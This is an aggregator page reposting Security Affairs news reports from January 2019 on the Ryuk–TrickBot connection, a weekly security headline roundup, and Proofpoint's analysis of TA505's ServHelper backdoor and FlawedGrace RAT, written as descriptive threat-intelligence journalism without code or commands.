Zicutake USA Comment | Search Articles

#History (Education) #Satellite report #Arkansas #Tech #Poker #Language and Life #Critics Cinema #Scientific #Hollywood #Future #Conspiracy #Curiosity #Washington



Which is the link between Ryuk ransomware and TrickBot?

Posted: 13 Jan 2019 09:43 PM PST

FireEye and CrowdStrike discovered that threat actors behind the Ryuk ransomware are working with another cybercrime gang to gain access to target networks.

In August 2018, security experts from Check Point uncovered a ransomware-based campaign aimed at organizations around the world conducted by North Korea-linked threat actor. This is the first time that a security firm detected the Ryuk Ransomware.

The campaign appears as targeted and well-planned, threat actors targeted several enterprises and encrypted hundreds of PC, storage and data centers in each infected company.

Some organizations paid an exceptionally large ransom in order to retrieve the encrypted files, CheckPoint confirmed that the ransom amount paid by the victims ranged between 15 BTC to 50 BTC.

At least three organizations in the United States and worldwide were severely affected, the attackers are estimated to have already netted over $640,000 to date.

The Ryuk ransomware appears connected to Hermes malware that was associated with the notorious Lazarus APT group.

The same ransomware was recently used in an attack that affected the newspaper distribution for large major newspapers, including the Wall Street Journal, the New York Times, and the Los Angeles Times.

Further investigation on the malware allowed the experts from security firms FireEye and CrowdStrike to discover that threat actors behind the
Ryuk ransomware are working with another cybercrime gang to gain access to target networks. They are collaborating with threat actors behind TrickBot, a malware that once infected a system creates a reverse shell back to the attackers allowing them to break into the network.

Experts at Crowdstrike believe the Ryuk ransomware is operated by a crime gang they tracked as GRIM SPIDER, in particular by its Russian based cell dubbed WIZARD SPIDER that is behind TrickBot.

“GRIM SPIDER is a sophisticated eCrime group that has been operating the Ryuk ransomware since August 2018, targeting large organizations for a high-ransom return. This methodology, known as "big game hunting," signals a shift in operations for WIZARD SPIDER, a criminal enterprise of which GRIM SPIDER appears to be a cell.” reads the report published by

“The WIZARD SPIDER threat group, known as the Russia-based operator of the TrickBot banking malware, had focused primarily on wire fraud in the past.”

FireEye is tracking the same financially-motivated activity as TEMP.MixMaster which involved attackers using the Ryuk ransomware associated with TrickBot infections. 

The circumstance suggests that TrickBot operators are adopting the crime-as-a-service model to offer access to systems they have previosly compromised.

“It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware.” reads the post published by FireEye.

“The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations,”

TrickBot is distributed through massive spam campaigns or it can be delivered by the Emotet that is also distributed through malspam.

FireEye experts observed malspam campaign distributing Ryuk that used messages pretending to be a Deloitte payroll schedule.

“Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server.” continues FireEye.

“Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign's broad distribution both geographically and across industry verticals.”

Attackers used the PowerShell post-exploitation toolkit called Empire. Empire to distribute payloads through the accessed network.

Empire allows to steal credentials on other computers in the network and then install the Ryuk Ransomware on them.

The investigations conducted by FireEye, CrowdStrike, McAfee seems to exclude that Ryuk is associated with North Korea, the experts believe threat actors behind the ransomware are from Russia.

According to McAfee, initial attribution to North Korea might be wrong because only based on the code similarities between Ryuk and Hermes. The experts pointed out that in August 2017, the Hermes ransomware was being sold online on Exploit.in by a Russian speaking actor.

Likely, the Lazarus Group bought the ransomware and used it in its operations to make hard the attribution of the operation.

Pierluigi Paganini

(SecurityAffairs – hacking, Ryuk ransomware)

The post Which is the link between Ryuk ransomware and TrickBot? appeared first on Security Affairs.

Security Affairs newsletter Round 196 – News of the week

Posted: 13 Jan 2019 07:43 AM PST

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Blur data leak potentially exposed data of 2.4 Million users
Dark Overlord hacking crew publishes first batch of confidential 9/11 files
Australian Early Warning Network hacked and used to send fake alerts
Hackers have stolen customer data from Titan Manufacturing and Distributing company for nearly one year
NSA will reveal its GHIDRA Reverse Engineering tool at RSA Conference
ReiKey app for macOS can detect Mac Keyloggers using event taps
Coinbase suspended Ethereum Classic (ETC) trading after a successful 51% attack
German youngster behind massive data leak of German politicians data
Nine 2019 Cybersecurity Predictions
Tens of thousands of hot tubs are exposed to hack
Zerodium offers $2 Million for remote iOS jailbreaks, and much more
Adobe addresses 'Important Flaws in Connect, Digital Editions
First Google security patches for Android in 2019 fix a critical flaw
Microsoft January 2019 Patch Tuesday updates fix 7 critical vulnerabilities
State attorneys general announced a $1.5 million settlement with Neiman Marcus
Alleged Iran-linked APT groups behind global DNS Hijacking campaign
CISCO addresses DoS bugs in CISCO ESA products
Ironic turn … Kaspersky Labs helped NSA to catch alleged data thief
Three security bugs found in the popular Linux suite systemd
British hacker sentenced to jail for attack on Liberian Telecoms firms
Reddit locked Down accounts due to alleged security breach
The 'AVE_MARIA Malware
Victims of Pylocky ransomware can decrypt their files for free
Hacktivist Martin Gottesfeld 10 years in prison for hospital cyberattack
Rapid7 announced the release of Metasploit 5.0
Z-WASP attack: hackers used Zero-Width spaces to bypass Office 365 protections

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 196 – News of the week appeared first on Security Affairs.

TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal

Posted: 13 Jan 2019 06:42 AM PST

Proofpoint analyzed two strains of malware tracked as ServHelper and FlawedGrace distributed through phishing campaigns by the TA505 crime gang.

Security researchers at Proofpoint researchers discovered two strains of malware tracked as ServHelper and FlawedGrace distributed through phishing campaigns by the TA505 crime gang.

The ServHelper is a backdoor, experts analyzed two variants of it, while FlawedGrace is a remote access trojan (RAT).

“In November 2018, TA505, a prolific actor that has been at the forefront of this trend, began distributing  a new backdoor we named "ServHelper". ServHelper has two variants: one focused on remote desktop functions and a second that primarily functions as a downloader.” reads the analysis published by Proofpoint.

“Additionally we have observed the downloader variant download a malware we call "FlawedGrace." FlawedGrace is a full-featured RAT that we first observed in November 2017.”

The TA505 group was first spotted by Proofpoint back 2017, it has been active at least since 2015 and targets organizations in financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including
the Dridex banking trojan, tRAT RAT, FlawedAmmy RAT,
Philadelphia ransomware, GlobeImposter and Locky ransomware.

In November experts observed several campaigns carried out by the
TA505 group, in three of them the threat actors delivered the ServHelper malware.
The ServHelper backdoor is written in Delphi and according to the experts, the development team continues to update it by implementing with new features. Researchers pointed out that almost every new campaign used a new variant of the malware.

One of the largest campaigns distributed tens of thousands of emails and leveraged weaponized .DOC, .PUB, and .WIZ documents.

TA505 mail

On December 13, Proofpoint observed a third campaign spreading the ServHelper backdoor.

“On December 13, 2018, we observed another large ServHelper "downloader" campaign targeting retail and financial services customers.” reads the analysis published by Proofpoint.

“The messages used a mixture of Microsoft Word attachments with embedded malicious macros, PDF attachments with URLs linking to a fake "Adobe PDF Plugin" webpage linking to the malware, and direct URLs in the email body linking to a ServHelper executable.”

The attacks leveraging the two malware were not targeted in nature attackers aimed at financial services organizations worldwide.

Once downloaded the ServHelper backdoor set up reverse SSH tunnels that allow attackers to access to the infected system via Remote Desktop Protocol (RDP) on port 3389.

“As noted, there are two distinct variants of ServHelper: a "tunnel" variant and a "downloader" variant. The "tunnel" variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). ”
continues Proofpoint.

“Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to "hijack" legitimate user accounts or their web browser profiles and use them as they see fit,”

Experts also discovered another ServHelper variant that does not include the tunneling and hijacking capabilities, in this case, the backdoor was used only as a downloader for the FlawedGrace RAT.

The threat actors use the .bit Top-Level Domain (TLD) for the Domain Name System (DNS) servers. The support for ".bit" C&C domains was added to protect the C2 infrastructure, this TLD is associated with the cryptocurrency Namecoin and requires special DNS servers that the malware uses (dedsolutions[.]bit, arepos[.]bit).null

The .bit TLD is not controlled by ICANN this means that it is impossible to ask the organization to shu down a fraudulent domain used as C2.

The TA505 group also use the FlawedGrace RAT, the malware is written in C++ and according to Proofpoint its coding style and techniques it implements suggest that RAT and ServHelper were developed by different groups.

“Threat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or like Locky ransomware it may become the dominant strain of malware in the wild. In this case, the group has started distributing two variants on a new backdoor we named ServHelper and a RAT we call FlawedGrace.” concluded Proofpoint.

“This also extends the trend that emerged in 2018, in which threat actors increasingly focused on distribution of downloaders, information stealers, RATS, and other malware that can remain resident on victim devices for far longer than destructive, "smash and grab" malware like ransomware.”

Pierluigi Paganini

(SecurityAffairs – TA505, cybercrime)

The post TA505 Group adds new ServHelper Backdoor and FlawedGrace RAT to its arsenal appeared first on Security Affairs.